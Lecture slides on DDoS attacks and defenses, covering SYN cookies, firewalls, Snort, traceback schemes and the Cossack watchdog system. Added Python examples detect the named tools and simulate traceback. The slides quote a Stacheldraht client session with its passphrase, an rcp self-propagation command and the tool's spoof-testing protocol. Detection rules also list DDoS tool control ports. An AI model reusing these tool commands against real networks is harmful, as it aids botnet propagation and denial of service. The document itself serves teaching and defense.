
Distributed Denial of Service Attacks (DDoS)

Christos Papadopoulos

Some Common DoS Attacks

• Smurf
• SYN flood
• UDP floods

Smurf Attack (diagram)

attacker → amplifier network: broadcast echo request, with the source address spoofed to be the target's address

amplifier network → target: many echo replies are received by the target, since most machines on the amplifier network respond to the broadcast

TCP SYN Flooding: A potentially more powerful attack

Normal handshake between client (port 33623/tcp) and server (port 23/tcp):

client → server: SYN
server → client: SYN-ACK
client → server: ACK
[session proceeds; ACK set for remainder of session]

Attack against target (port 23/tcp):

attacker → target: SPOOFED SYN (source address of a nonexistent host)
target → nonexistent host: SYN-ACK
FINAL ACK NEVER SENT; the target holds the half-open connection until it times out

Protection against SYN Attacks

SYN cookies (D. J. Bernstein and Eric Schenk) avoid half-open TCP connections.

• Server responds to a TCP SYN with a SYN-ACK whose sequence number is a cookie:

sqn = f(src addr, src port, dst addr, dst port, secret seed)

• Server keeps no state for the connection.

• If an ACK arrives from the client, the server checks whether it is a response to a former SYN-ACK (the acknowledged number minus one must equal the recomputed cookie).

• If yes, the server enters the TCP_ESTABLISHED state.

In practice the cookie also encodes a coarse timestamp, so that old cookies expire and cannot be replayed indefinitely, and a few bits describing the client's MSS, since the options from the original SYN are not retained.

SYN Cookie Exchange

SYN cookies firewall

The SYN cookies firewall adds a firewall feature in Linux: the firewall completes the handshake with the client using SYN cookies before it opens a connection to the server.

1. client → firewall: SYN
2. firewall → client: SYN-ACK (cookie)
3. client → firewall: ACK
4. firewall → server: SYN
5. server → firewall: SYN-ACK
6. firewall → server: ACK
7. firewall relays the connection

Under attack, step 3 never occurs, so the server never sees the spoofed SYNs.
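The cookie computation and check described above, written out in Python as an added example (this is not code from the talk, nor the Linux implementation). It follows the slide's f(src addr, src port, dst addr, dst port, secret seed) but adds a coarse time counter in the top byte so a cookie expires, and a short simulation in which spoofed SYNs from nonexistent hosts produce SYN-ACKs without any half-open state. The secret seed, the 203.0.113.x / 192.0.2.x / 198.51.100.x addresses and the 2-tick maximum age are assumptions for the example.

```python
import hashlib
import hmac

# Assumption: a per-server secret seed, generated at boot and kept private.
SECRET_SEED = b"example-secret-seed"


def _mac24(saddr, sport, daddr, dport, counter, secret=SECRET_SEED):
    """24-bit truncated MAC over the 4-tuple and the time counter (the slide's f(...))."""
    msg = f"{saddr}:{sport}>{daddr}:{dport}|{counter}".encode()
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def make_syn_cookie(saddr, sport, daddr, dport, counter, secret=SECRET_SEED):
    """Server ISN for the SYN-ACK: top 8 bits = coarse time counter (added so cookies
    expire; the slide's f(...) has no time input), low 24 bits = MAC.
    No per-connection state is stored when this is sent."""
    counter &= 0xFF
    return (counter << 24) | _mac24(saddr, sport, daddr, dport, counter, secret)


def check_syn_cookie(saddr, sport, daddr, dport, ack_num, now_counter,
                     secret=SECRET_SEED, max_age=2):
    """Validate a bare ACK: it must acknowledge ISN+1, the embedded counter must be
    recent, and the MAC must match what we would have sent for this 4-tuple."""
    cookie = (ack_num - 1) & 0xFFFFFFFF        # client acknowledges our ISN + 1
    counter = cookie >> 24
    if ((now_counter - counter) & 0xFF) > max_age:
        return False                           # stale cookie, or one we never issued
    return (cookie & 0xFFFFFF) == _mac24(saddr, sport, daddr, dport, counter, secret)


def handshake_demo(n_spoofed_syns, counter=100):
    """The slide's scenario: spoofed SYNs from nonexistent hosts each get a SYN-ACK,
    yet the half-open table stays empty; one real client then completes the handshake.
    Returns (number of half-open entries, whether the real client was established)."""
    half_open_table = []   # never appended to: SYN cookies keep no state before the ACK
    for i in range(n_spoofed_syns):
        make_syn_cookie(f"203.0.113.{i % 256}", 40000 + i, "198.51.100.5", 23, counter)
    isn = make_syn_cookie("192.0.2.7", 33623, "198.51.100.5", 23, counter)
    established = check_syn_cookie("192.0.2.7", 33623, "198.51.100.5", 23,
                                   (isn + 1) & 0xFFFFFFFF, counter + 1)
    return len(half_open_table), established


if __name__ == "__main__":
    print(handshake_demo(1000))
```

The check is stateless on the server side: every piece of information needed to accept the ACK is recomputed from the packet headers and the secret, which is exactly why a flood of spoofed SYNs costs the server nothing but the SYN-ACK bandwidth.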

What Is a Firewall?

An access control device that performs perimeter security by deciding which packets are allowed or denied into or out of a network. May be a hardware device or a software program running on a secure host computer. Sits at a junction point or gateway between two networks (e.g., public Internet and private intranet).

Firewall Location (diagram)

Firewall Types (diagram)

Why a Firewall?

Analogy: a firewall keeps a fire from spreading from one part of the building to another.

Prevents the dangers of the Internet from spreading to your internal network.

• Restricts packets to entering at a carefully controlled point.

• Prevents attackers from getting close to your other defenses.

• Restricts packets to leaving at a carefully controlled point.

What Does a Firewall Do?

A firewall is an aggregation point for security decisions.

• A firewall can enforce security policy.
• A firewall can log Internet activity efficiently.
• A firewall protects the network as a resource.
• A firewall limits your exposure.
• A firewall can provide protection for vulnerable services.

What Does a Firewall Not Do?

A firewall can't protect you against:

• malicious insiders
• careless employees
• connections that don't go through it
• viruses and trojans, data-driven attacks
• illicit rendezvous (unauthorized tunneled connections)
• completely new threats

Additional security measures must be incorporated along with the firewall (physical security, host security, user education).

Caveats

Firewall technology can provide a false sense of security and may lead to lax security within the firewall perimeter. Analogy: firewalls provide "a hard, crunchy outside with a soft chewy center."

A misconfigured firewall is ineffective. Firewalls must be maintained and updated daily. Audit logs must be actively monitored.

What Is DDoS

• Distributed Denial of Service
• New, more pernicious type of attack
• Many hosts "gang up" to attack another host
• Network resource attack: bandwidth, state

Why Should We Care

• Successfully used to attack prominent sites on the Internet by attackers with only a primitive understanding of Internet protocols
• It is relatively easy to do, but hard to detect and stop
• It is only going to get worse unless we develop adequate protection mechanisms

Anatomy of an Attack

• Compromise a large set of machines
• Install attack tools
• Instruct all attack machines to initiate the attack against a victim

The process is highly automated.

Phase 1: Compromise

A (stolen) account is used as a repository for the attack tools.

A scan is performed to identify potential victims.

A script is used to compromise the victims.

Phase 2: Install Attack Tools

• An automated installation script is then run on the “owned” systems to download and install the attack tool(s) from the repository.

• Optionally, a “root kit” is installed on the compromised systems.

Phase 3: Launch attack

• Launch a coordinated DDoS from different sites against a single victim.

• Network pipes of the attackers can be small, but their aggregated bandwidth is far larger than the victim's pipe.

• Each attacker's ISP may not notice the elevated traffic, since each individual stream is modest.

• DDoS attacks are harder to track than a DoS from a single source.

Some Known DDoS Attack Tools

Trin00

Tribal Flood Network (TFN)

Tribal Flood Network 2000 (TFN2K)

Stacheldraht

Trin00

Distributed UDP flood attack.

Attacker connects to port 27665/tcp on the master machines using telnet.

Master relays the commands to the daemons using UDP port 27444.

Daemons carry out the commands and respond on UDP port 31335.

TFN

General design similar to trin00.

Capable of a number of attacks such as ICMP flood, SYN flood, UDP flood and Smurf-style attacks.

Communication between clients (handlers) and daemons is done via ICMP echo replies. Commands are hidden inside the ID field of the ICMP packet.

The traffic looks identical to standard ping replies and hence cannot be blocked at a firewall without also blocking the replies that legitimate outgoing pings need.

Absence of TCP and UDP traffic makes these packets difficult to detect.

TFN2K

TFN2K communicates via TCP, UDP (random ports), ICMP echo replies, or all three at random.

The daemon never responds to the master.

The master sends all commands twenty times for reliability.

TFN2K sends out decoy packets to random machines to make it unclear which machines are clients.

All commands are encrypted with a compile-time password.

TFN2K daemons can randomly alternate between different types of attacks.

Stacheldraht

Combines features of trin00 with those of TFN.

Adds encryption of the communication between the attacker and the masters, and automated update of the agents.

Communication between attacker and masters takes place on TCP port 16660.

Daemons receive commands from masters through ICMP echo replies (using the data part of the packet).

Possible attacks are ICMP flood, UDP flood, SYN flood and Smurf attack.

Sample Stacheldraht client session:

    # ./client 192.168.0.1
    [*] stacheldraht [*]
    (c) in 1999 by ...
    trying to connect...
    connection established.
    --------------------------------------
    enter the passphrase : sicken
    --------------------------------------
    entering interactive session.
    ******************************
    welcome to stacheldraht
    ******************************
    type .help if you are lame
    stacheldraht(status: a!1 d!0)>

    stacheldraht(status: a!1 d!0)>.help
    available commands in this version are:
    --------------------------------------------------
    .mtimer   .mudp     .micmp    .msyn     .msort    .mping
    .madd     .mlist    .msadd    .msrem    .distro   .help
    .setusize .setisize .mdie     .sprange  .mstop    .killall
    .showdead .showalive
    --------------------------------------------------
    stacheldraht(status: a!1 d!0)>

Some Commands

.distro user server
    Instructs the agent to install and run a new copy of itself using the Berkeley "rcp" command, on the system "server", using the account "user" (e.g., "rcp user@server:linux.bin ttymon").

.madd ip1[:ip2[:ipN]]
    Add IP addresses to the list of attack victims.

.mdie
    Sends a die request to all agents.

Spoof Testing

The agent tests whether the system it runs on allows source-address spoofing.

The agent sends out an ICMP echo packet with ID 666 and a forged source IP address of 3.3.3.3, with the real IP address of the compromised machine embedded in the data field.

If the packet arrives, the handler reads the agent's IP address from the data field and replies with ID 1000 and the string "spoofworks" in the data field; the agent then sets its spoof level to 0 (full spoofing possible). If no such reply arrives, the agent sets the spoof level to 3, meaning only the last octet of the source address can be spoofed.

Defending Against DDoS

• Prevent compromise of machines with Intrusion Detection Systems (IDS)
• Trace back to the attacker
• Develop automated network defense mechanisms

Intrusion Detection: Snort

Packet-sniffing network intrusion detection system

• Libpcap-based sniffing interface
• Rules-based detection engine
• Multiple output options: decoded logs, tcpdump-formatted logs; real-time alerting to syslog, file, winpopup

© Copyright 1999, Martin Roesch

USENIX LISA ‘99 Conference

Detection Engine

• Rules form "signatures"; modular detection elements are combined to form these signatures
• Anomalous activity detection is possible: stealth scans, OS fingerprinting, invalid ICMP codes, etc.
• The rules system is very flexible, and creation of new rules is relatively simple

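As an added example (not from the slides, and not Snort itself), the following Python shows the two detection styles the Snort slides describe, applied to the tool traffic described earlier: signature rules in a Snort-like header-plus-options shape encode the control-channel indicators given for trin00 and Stacheldraht (TCP 27665, UDP 27444 and 31335, TCP 16660, the ID 666 / ID 1000 spoof-test exchange), and an anomaly check flags ICMP echo replies that no echo request preceded, which is the remaining handle on TFN-style commands hidden in echo replies. The packet records are constructed; the 192.0.2.x / 198.51.100.x addresses and the alert messages are ours.

```python
from dataclasses import dataclass


@dataclass
class Pkt:
    proto: str            # "tcp", "udp" or "icmp"
    src: str
    dst: str
    sport: int = 0
    dport: int = 0
    itype: int = -1       # ICMP type: 8 = echo request, 0 = echo reply
    icmp_id: int = -1     # ICMP identifier field
    payload: bytes = b""


# Snort-style signatures: every key except "msg" must match the packet;
# "content" is a substring match on the payload, the rest compare header fields.
# Ports, IDs and the 3.3.3.3 source come from the tool descriptions above.
RULES = [
    {"msg": "trin00 attacker->master", "proto": "tcp", "dport": 27665},
    {"msg": "trin00 master->daemon", "proto": "udp", "dport": 27444},
    {"msg": "trin00 daemon->master", "proto": "udp", "dport": 31335},
    {"msg": "stacheldraht attacker->handler", "proto": "tcp", "dport": 16660},
    {"msg": "stacheldraht agent spoof test", "proto": "icmp", "itype": 8,
     "icmp_id": 666, "src": "3.3.3.3"},
    {"msg": "stacheldraht handler spoof reply", "proto": "icmp", "itype": 0,
     "icmp_id": 1000, "content": b"spoofworks"},
]


def match_rule(rule, pkt):
    for key, want in rule.items():
        if key == "msg":
            continue
        if key == "content":
            if want not in pkt.payload:
                return False
        elif getattr(pkt, key) != want:
            return False
    return True


def signature_alerts(pkts):
    """(packet index, rule message) for every rule that fires."""
    return [(i, r["msg"]) for i, p in enumerate(pkts) for r in RULES if match_rule(r, p)]


def unsolicited_echo_replies(pkts):
    """Anomaly check: indices of echo replies with no preceding echo request from
    dst to src carrying the same ID. Catches TFN-style commands in echo replies and
    reflected ping floods; normal ping traffic is paired off and not reported."""
    outstanding = set()
    hits = []
    for i, p in enumerate(pkts):
        if p.proto != "icmp":
            continue
        if p.itype == 8:
            outstanding.add((p.src, p.dst, p.icmp_id))
        elif p.itype == 0:
            key = (p.dst, p.src, p.icmp_id)       # reply reverses the request's direction
            if key in outstanding:
                outstanding.discard(key)
            else:
                hits.append(i)
    return hits


# Constructed sample traffic (documentation addresses; not a real capture).
SAMPLE_PACKETS = [
    Pkt("tcp", "198.51.100.7", "192.0.2.10", sport=4001, dport=27665),          # 0 trin00 control
    Pkt("udp", "192.0.2.10", "192.0.2.20", sport=5001, dport=27444),            # 1 master -> daemon
    Pkt("udp", "192.0.2.20", "192.0.2.10", sport=5002, dport=31335),            # 2 daemon -> master
    Pkt("icmp", "3.3.3.3", "192.0.2.30", itype=8, icmp_id=666, payload=b"192.0.2.40"),  # 3 spoof test
    Pkt("icmp", "192.0.2.30", "192.0.2.40", itype=0, icmp_id=1000, payload=b"spoofworks"),  # 4
    Pkt("icmp", "192.0.2.50", "192.0.2.60", itype=8, icmp_id=1),                # 5 legitimate ping
    Pkt("icmp", "192.0.2.60", "192.0.2.50", itype=0, icmp_id=1),                # 6 its reply
    Pkt("icmp", "192.0.2.70", "192.0.2.60", itype=0, icmp_id=4242, payload=b"cmd"),  # 7 unsolicited
    Pkt("tcp", "192.0.2.80", "192.0.2.10", sport=6001, dport=22),               # 8 benign ssh
]

if __name__ == "__main__":
    for idx, msg in signature_alerts(SAMPLE_PACKETS):
        print(f"pkt {idx}: {msg}")
    print("unsolicited echo replies:", unsolicited_echo_replies(SAMPLE_PACKETS))
```

The signature rules are only as good as the fixed ports and IDs the tools happen to use; TFN2K, which randomizes ports and protocols, would slip past them, which is why the reply-without-request check is the more durable of the two.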

Traceback Techniques

• Logging
• Link testing
• Node append
• Node sampling
• Overlays
• Edge sampling
• Trace messages

Why Traceback Is Hard

The IP source address is spoofed: the attacker forms IP packets with a forged source address and sends them using a socket of type SOCK_RAW, which requires root privilege.

Avoiding Spoofed Packets

Ingress filtering prohibits an attacker from forging an IP address outside its own network. At the first-hop router:

    if the packet's source IP address is within the predefined range
        then forward the packet
        else drop the packet

The filter must be deployed by the network the attacker sits in, not by the victim; it only limits spoofing to addresses inside the attacker's own prefix.

(-) Mobile hosts use their home network address in Mobile IP, so a strict filter drops their traffic

Logging (Audit Trailing)

Record packets at predetermined routers and use data-mining techniques to construct the path traversed by the packet.

(+) Easy
(+) Permits post-mortem analysis
(-) Requires a large amount of disk and computing resources
(-) Requires maps for reconstruction
(-) Manual, time-consuming

Link Testing

Involves interactively testing the upstream links, starting from the victim, to determine the links used to carry the attacker's traffic.

Two techniques: input debugging and controlled flooding.

Link Testing (Input Debugging)

Determine the attack signature. Filter matching packets at the egress port and determine at which ingress port they arrived. Perform this iteratively at all upstream routers until the source(s) are found.

(-) Relies heavily on manual intervention and is extremely slow
(-) Requires inter-ISP co-operation

Link Testing (Controlled Flooding)

Flood links with large amounts of UDP traffic (UDP-chargen).

Observe changes in traffic pattern.

Reconstruct path to attacker recursively.

(diagram: Victim, routers R1 to R5, hosts A and B, and the Attacker; the victim sends UDP chargen requests, the chargen replies load the candidate links, and the change in the rate of arriving attack packets shows which link carries them)

Link Testing (Controlled Flooding)

(+) Effective

(-) Requires information about the internet topology

(-) Inherently noisy

(-) Difficult to discern the set of paths in case of DDoS attacks

(-) DoS attack by itself

(-) Requires co-operation from upstream routers

Node Append

Record the route in the packet as it traverses the routers: each router appends its IP address to the end of the packet.

(+) Easy to implement
(+) A single packet is required to find the attack path
(-) Increases the packet size (4 bytes/hop)
(-) Processing overhead
(-) Fragmentation

Node Sampling

Each router inserts its IP address in a static field with probability p.

p(1 - p)^(d-1) is the probability of receiving a packet carrying the address of a router at distance d.

Reconstruction algorithm: rank each router by the number of samples received, then reconstruct the path using the ranks.

(-) Need more than 42,000 samples for d = 15 and p = 0.51 before a single packet from the first-hop router is expected

CenterTrack

(diagram: IP tunnels; nodes labelled v and a)

Create an overlay network using IP tunnels. Tunnels are created between edge and transit routers. Based on the attack signature, perform logging and/or corrective action in the overlay network.

CenterTrack (Cont…)

(+) Eliminates the need for transit-router input debugging
(+) Required features available
(+) Is not too expensive
(+) Scales well
(-) Still requires input debugging at the edge
(-) Changes routes (attackers might notice)

Edge Sampling

Three fields in the packet: two IPs (start and end of an edge) and a distance.

When a router decides to mark, it writes its IP into the start field and sets the distance field to 0.

The next router either marks afresh (rewriting the start field and resetting the distance to 0) or fills in the remaining information (the end IP) and increments the distance.

Further routers increment the distance field or start afresh. Marking probability p < 1.

Edge Sampling Algorithm

At router R, for each packet pkt:

    let u be a uniform random number in [0, 1)
    if u < p:                          (mark with probability p)
        pkt.distance := 0
        pkt.startIP  := R.IP
    else:
        if pkt.distance == 0:
            pkt.endIP := R.IP
        pkt.distance := pkt.distance + 1
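To make the node-sampling arithmetic and the edge-sampling procedure concrete, here is an added Python simulation (not code from the slides): it computes the expected number of packets before a sample from distance d arrives under node sampling (which is where the 42,000 figure for d = 15, p = 0.51 comes from), runs the edge-sampling marking step above at each router of a single attack path, and reconstructs the path at the victim from the (start, end, distance) samples. The router names R1..R15, the victim label V, the seed and the low marking probability p = 0.04 are choices made for the example.

```python
import random


def node_sampling_expected(d, p):
    """Node sampling: the router at distance d from the victim survives in a packet's
    single address field with probability p(1-p)^(d-1), so on average
    1 / (p(1-p)^(d-1)) packets arrive before one of its samples does.
    For d = 15, p = 0.51 this is between 42,000 and 43,000."""
    return 1.0 / (p * (1.0 - p) ** (d - 1))


def edge_sample(pkt, router, p, rng):
    """One router's step of the edge sampling algorithm. pkt has fields start, end,
    distance; distance None means no router has marked the packet yet."""
    if rng.random() < p:                 # mark with probability p
        pkt["start"] = router
        pkt["end"] = None
        pkt["distance"] = 0
    elif pkt["distance"] is not None:    # an upstream router marked it
        if pkt["distance"] == 0:         # we are the downstream end of that edge
            pkt["end"] = router
        pkt["distance"] += 1


def collect_edges(path, p, n, seed=1):
    """Send n attack packets along path (path[0] nearest the attacker, path[-1] nearest
    the victim) and return the set of (start, end, distance) samples the victim sees."""
    rng = random.Random(seed)
    edges = set()
    for _ in range(n):
        pkt = {"start": None, "end": None, "distance": None}
        for router in path:
            edge_sample(pkt, router, p, rng)
        if pkt["distance"] is None:
            continue                      # unmarked packet carries no path information
        # A mark at the last router reaches the victim with end unset: that edge ends at V.
        end = pkt["end"] if pkt["end"] is not None else "V"
        edges.add((pkt["start"], end, pkt["distance"]))
    return edges


def reconstruct(edges, victim="V"):
    """Walk outward from the victim: distance-0 edges end at the victim, distance-1
    edges end at the router a distance-0 edge started from, and so on."""
    route = [victim]
    dist = 0
    while True:
        nxt = sorted(s for (s, e, d) in edges if d == dist and e == route[-1])
        if not nxt:
            return route
        route.append(nxt[0])
        dist += 1


if __name__ == "__main__":
    print(f"node sampling, d=15 p=0.51: ~{node_sampling_expected(15, 0.51):.0f} packets")
    attack_path = [f"R{i}" for i in range(1, 16)]        # R1 at the attacker, R15 at the victim
    samples = collect_edges(attack_path, p=0.04, n=5000)
    print("edge samples:", len(samples))
    print("reconstructed:", " <- ".join(reconstruct(samples)))
```

With a small p the rarest edge (the one at the attacker's first hop) is still sampled with probability p(1-p)^(d-1), roughly 0.023 per packet here, so a few thousand attack packets suffice; a large p like 0.51 makes downstream routers overwrite upstream marks almost every time, which is the effect the 42,000 figure measures.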

ICMP Traceback

Concept: intermediate routers generate trace packets with a probability p, destined for the victim. Routers encode partial path information in each packet. The victim can reconstruct the attack path given a sufficient number of trace packets.

ICMP Traceback

Create a new type of ICMP message called ICMP Traceback (then in the IETF standards process).

Packet size limited to 576 bytes. Traceback messages generated with probability 1/20,000. Initial TTL of the new IP packet MUST be 255.

ICMP Traceback (diagram)

Cossack

Cossack Overview

• Distributed set of watchdogs monitor the network
• Localized IDS for blind detection
• Topology information to pre-filter the target
• Group communication for robustness
• Distributed coordination: no centralized controller
• Attack-driven dynamic grouping of watchdogs
• Consult with other watchdogs to correlate attacks
• Selectively deploy countermeasures to suppress attacks

Cossack: A Simplified View (diagram: four attackers, a target, and watchdogs W distributed across the network)

Attacks Begin (diagram)

Watchdogs Communicate Using YOID (diagram)

Attacks Detected (diagram)

Watchdogs Install Filters and Eliminate Attack (diagram)

Attack No 4

Ping reflection attack (40-byte packets)
Victim: server at USC
Attackers: 145 reflectors located in Brazil, Japan, Korea, Singapore, United States. Zombie location unknown.
Duration: 285 seconds

Sample trace (anonymized):

1025390161.422173 192.168.123.4 > 10.12.30.4: icmp: echo reply (DF)
1025390161.422178 10.0.4.5 > 10.12.30.4: icmp: echo reply (DF)
1025390161.422757 192.168.3.5 > 10.12.30.4: icmp: echo reply (DF)

Attack 4: Packet Rate

Attack 4: Bandwidth

Attack 4: Transient Behavior

Attack 13: Attack Description

Victim: server at Caltech
Spoofed source addresses (> 100,000)
Duration: 1794 seconds

Sample trace (anonymized):

1026570396.847625 10.0.8.9.22803 > 10.2.2.1.44758: . ack 0 win 8459
1026570396.847630 192.168.123.4.59606 > 10.2.2.1.44649: . ack 0 win 3584
1026570396.847635 10.0.5.1.6616 > 10.2.2.1.44765: . ack 0 win 10
1026570396.847639 0.0.0.0.23139 > 10.2.2.1.44766: . ack 0 win 48231
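The trace lines quoted for Attack 4 and Attack 13 are enough to show two of the earlier points in code. The following Python is an added example (not part of the talk): it parses the tcpdump-format lines as printed on the slides, reports destinations receiving echo replies from many distinct sources (the reflection signature of Attack 4), and applies the first-hop ingress filtering rule from the "Avoiding Spoofed Packets" slide to the Attack 13 sources, where the random spoofed addresses (including the impossible 0.0.0.0) would have been dropped at the attacker's edge. The allowed prefix 10.0.0.0/16 is an assumed customer range; the addresses are the anonymized ones from the slides.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed from the (anonymized) sample trace lines quoted on the slides.
ATTACK4_TRACE = [
    "1025390161.422173 192.168.123.4 > 10.12.30.4: icmp: echo reply (DF)",
    "1025390161.422178 10.0.4.5 > 10.12.30.4: icmp: echo reply (DF)",
    "1025390161.422757 192.168.3.5 > 10.12.30.4: icmp: echo reply (DF)",
]
ATTACK13_TRACE = [
    "1026570396.847625 10.0.8.9.22803 > 10.2.2.1.44758: . ack 0 win 8459",
    "1026570396.847630 192.168.123.4.59606 > 10.2.2.1.44649: . ack 0 win 3584",
    "1026570396.847635 10.0.5.1.6616 > 10.2.2.1.44765: . ack 0 win 10",
    "1026570396.847639 0.0.0.0.23139 > 10.2.2.1.44766: . ack 0 win 48231",
]

# Assumption: the prefix the first-hop router would accept as "its" customer's range.
ALLOWED_EXAMPLE = [ipaddress.ip_network("10.0.0.0/16")]

ICMP_RE = re.compile(r"^(?P<ts>\S+) (?P<src>[\d.]+) > (?P<dst>[\d.]+): icmp: echo reply")
TCP_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): \. ack (?P<ack>\d+) win (?P<win>\d+)"
)


def parse_line(line):
    """Parse one tcpdump text line of the two shapes seen on the slides; None otherwise."""
    m = ICMP_RE.match(line)
    if m:
        return {"ts": float(m["ts"]), "proto": "icmp-echo-reply",
                "src": m["src"], "dst": m["dst"]}
    m = TCP_RE.match(line)
    if m:
        return {"ts": float(m["ts"]), "proto": "tcp-ack", "src": m["src"], "dst": m["dst"],
                "sport": int(m["sport"]), "dport": int(m["dport"]),
                "ack": int(m["ack"]), "win": int(m["win"])}
    return None


def ingress_filter(src, allowed):
    """First-hop router rule from the slide: forward if src lies inside the predefined
    range, otherwise drop. Returns True when the packet would be forwarded."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in allowed)


def reflection_victims(pkts, min_sources=3):
    """Destinations receiving echo replies from at least min_sources distinct hosts:
    the many-reflectors-to-one-target pattern of Attack 4."""
    by_dst = defaultdict(set)
    for p in pkts:
        if p["proto"] == "icmp-echo-reply":
            by_dst[p["dst"]].add(p["src"])
    return {dst: len(srcs) for dst, srcs in by_dst.items() if len(srcs) >= min_sources}


def spoofed_at_edge(pkts, allowed):
    """Source addresses the first-hop router would have dropped under ingress filtering."""
    return [p["src"] for p in pkts if not ingress_filter(p["src"], allowed)]


def summarize():
    p4 = [parse_line(l) for l in ATTACK4_TRACE]
    p13 = [parse_line(l) for l in ATTACK13_TRACE]
    return {
        "attack4_reflection_targets": reflection_victims(p4),
        "attack13_all_bare_acks": all(p["proto"] == "tcp-ack" and p["ack"] == 0 for p in p13),
        "attack13_dropped_by_ingress_filter": spoofed_at_edge(p13, ALLOWED_EXAMPLE),
    }


if __name__ == "__main__":
    print(summarize())
```

Only three lines per attack are printed on the slides, so the thresholds are tiny here; on a real capture the same grouping by destination and the same per-prefix check scale to the 145 reflectors and the more than 100,000 spoofed sources the slides report.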

Attack 13: Packet Rate

Attack 13 Transient Behavior

FFT Analysis (charts): Attack 4, Attack 13

Demo

Goal: capture low-level pulsing attacks that elude normal SNMP statistics.

Scenario: the victim is attacked by many low-level pulsing streams; SNMP sampling is too coarse to isolate the attackers; the watchdog at the victim asks the watchdogs at the source networks to change their sampling interval; the attack streams are detected.

Real-life event faced by a net admin at USC.

Demo Testbed (diagram: three watchdogs W, attackers A1, A2 and A3, the Target, and a traffic monitor running MRTG)

Attack Begins (diagram)

A1 and A3 each send a pulsing attack at 1% strength; A2 sends a pulsing attack at 98% strength (representing 98 other hosts).

MRTG sampling is too slow to catch the individual low-strength attacks, but it sees the full-strength attack.

Watchdogs Communicate (diagram)

• The victim's watchdog analyzes the attack traffic and determines the list of source addresses.
• It forms a Yoid group with the upstream watchdogs.

Watchdogs Scrutinize Traffic (diagram)

• The upstream watchdogs reduce their monitoring interval and detect the attack streams, including the 1% streams that MRTG missed.

Watchdogs Install Filters (diagram)

• The upstream watchdogs install filters in their routers to block the attack.

Attack Neutralized (diagram)